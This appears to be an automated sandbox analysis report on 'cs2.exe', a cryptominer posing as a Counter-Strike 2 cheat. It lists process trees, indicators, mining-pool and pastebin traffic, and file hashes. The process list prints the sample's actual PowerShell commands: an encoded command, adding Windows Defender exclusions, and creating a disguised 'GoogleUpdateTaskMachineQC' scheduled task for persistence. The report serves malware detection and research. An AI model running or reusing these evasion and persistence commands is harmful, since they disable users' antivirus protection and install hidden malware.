Analysis Overview
SHA256
4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6
Threat Level: Known bad
The file cs2.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-09 07:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-09 07:34
Reported
2024-06-09 07:37
Platform
win10-20240404-en
Max time kernel
32s
Max time network
41s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2948 created 3396 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 3396 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 3396 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\Explorer.EXE |
| PID 2948 created 3396 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\Explorer.EXE |
| PID 3156 created 3396 | N/A | C:\Users\Admin\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3156 created 3396 | N/A | C:\Users\Admin\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3156 created 3396 | N/A | C:\Users\Admin\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Google\Chrome\updater.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2948 set thread context of 3456 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\System32\dialer.exe |
| PID 3156 set thread context of 4900 | N/A | C:\Users\Admin\Google\Chrome\updater.exe | C:\Windows\System32\dialer.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Users\Admin\AppData\Local\Temp\cs2.exe
"C:\Users\Admin\AppData\Local\Temp\cs2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZwBiACMAPgA="
C:\Users\Admin\AppData\Local\conhost32.exe
"C:\Users\Admin\AppData\Local\conhost32.exe"
C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
"C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Google\Chrome\updater.exe
C:\Users\Admin\Google\Chrome\updater.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:5555 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 95.179.241.203:5555 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\conhost32.exe
| MD5 | 0ca285f9a8c43016ffe109a13b0e07a0 |
| SHA1 | a03f79912ab0fbfd10ee3ff67bff60671a8ad42f |
| SHA256 | 880123a7fac24705ffb6795713d32fdc21679ac00802e72cb54d86814be4fcf1 |
| SHA512 | b68ee3e6b8499ca4995390d8c614784d13629a326bbac0c9d258813723428cbd830021e68bd78f7ca7d8330c0eeb1b28405f29bb967349a205c98973086ef883 |
C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
| MD5 | dfae04e92d343bd110609b8194816131 |
| SHA1 | d1b1f02cb02273f56eef010a52072f6c6a23f071 |
| SHA256 | 807999620cb4783d5c8f282cc21a6c5829e9f99719cbcdb7a71bdacd58671daa |
| SHA512 | 6083ae949fef7c09102ac2d1fd6da30ec38b6044a9fe258a64ec07178cf5a180158a0fda32f76b76d14cff6653a8a17f8a5f15c747625be4a42fe015f48dc2fe |
memory/804-8-0x000000007261E000-0x000000007261F000-memory.dmp
memory/804-13-0x0000000001180000-0x00000000011B6000-memory.dmp
memory/804-15-0x0000000007150000-0x0000000007778000-memory.dmp
memory/804-14-0x0000000072610000-0x0000000072CFE000-memory.dmp
memory/804-16-0x0000000007020000-0x0000000007042000-memory.dmp
memory/804-17-0x00000000078F0000-0x0000000007956000-memory.dmp
memory/804-18-0x0000000007960000-0x00000000079C6000-memory.dmp
memory/804-21-0x0000000007AC0000-0x0000000007E10000-memory.dmp
memory/804-25-0x0000000007880000-0x000000000789C000-memory.dmp
memory/804-26-0x0000000008090000-0x00000000080DB000-memory.dmp
memory/804-30-0x00000000081D0000-0x0000000008246000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqv544na.qto.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/804-56-0x0000000009190000-0x00000000091AE000-memory.dmp
memory/804-61-0x0000000009210000-0x00000000092B5000-memory.dmp
memory/804-55-0x0000000073000000-0x000000007304B000-memory.dmp
memory/804-54-0x00000000091D0000-0x0000000009203000-memory.dmp
memory/804-62-0x00000000094C0000-0x0000000009554000-memory.dmp
memory/804-260-0x0000000009460000-0x000000000947A000-memory.dmp
memory/804-265-0x0000000009450000-0x0000000009458000-memory.dmp
memory/804-281-0x0000000072610000-0x0000000072CFE000-memory.dmp
memory/2948-282-0x00007FF73C9A0000-0x00007FF73CF5C000-memory.dmp
memory/4432-288-0x0000022449350000-0x0000022449372000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 84b947076ff79194bd2f2539c80d2fac |
| SHA1 | 154b54aa34a1521d59d373bae20197426707d285 |
| SHA256 | 858af83202a048447e425f4d815fd8faadbe060aa0777c0c1743f577f7b9ff92 |
| SHA512 | dd42a4187f5e806690aeb2f49734da7199e09f92f07125dd9b26aa2da2b8bb3b74db2b2fe3d2a83f75ab900731a1a1bc808923df80b1e239cd43b841499f701f |
memory/4432-291-0x0000022449500000-0x0000022449576000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4e36cd1fa1e00c532cb82880a8a6097d |
| SHA1 | 2d5a84ef221b0d5637fb854f68eef69d36065c15 |
| SHA256 | f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca |
| SHA512 | 4910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6 |
memory/3456-331-0x00007FFFED230000-0x00007FFFED2DE000-memory.dmp
memory/3456-330-0x00007FFFEFCB0000-0x00007FFFEFE8B000-memory.dmp
memory/640-346-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp
memory/1008-363-0x000002724A5C0000-0x000002724A5E7000-memory.dmp
memory/736-402-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp
memory/736-400-0x000002AE84820000-0x000002AE84847000-memory.dmp
memory/1008-364-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp
memory/640-345-0x0000021429E40000-0x0000021429E67000-memory.dmp
memory/584-343-0x0000014C6CE40000-0x0000014C6CE61000-memory.dmp
memory/584-342-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp
memory/584-341-0x0000014C6D230000-0x0000014C6D257000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1d2d913c3dc74c96a90c5f53810a4258 |
| SHA1 | 2ec54878f305c68ff23a03c612563267704db95e |
| SHA256 | 54d6b3b1c9dc258b5ffcdb51148e5c31131d5824d8ce43b78998c3a812b965e9 |
| SHA512 | 8a93c9b24aad835b7a10d8b511b5a8c07f19bcc426b1c15f1b5643822ccc1bdd045e2ea8fd3e5094c00320b9fe45b3cc70700e155992aaca4093c81e349e6853 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bbb673277fae96ee4bc299672085e949 |
| SHA1 | 731ccb1581a06bff2ca36ca46b20c91c9adc468c |
| SHA256 | 21a0a3c47eb15cec5d37688a67369836fda0164d0cd5afaa9a2aa52fb838685d |
| SHA512 | aa0efc1683991ed68027f0fbd1dfcf0616dd0c328bd015cb43987411e454e0583e8cc1a45bc9f689e873007071e0923d9be10a6db689ba268a167f856b6a8425 |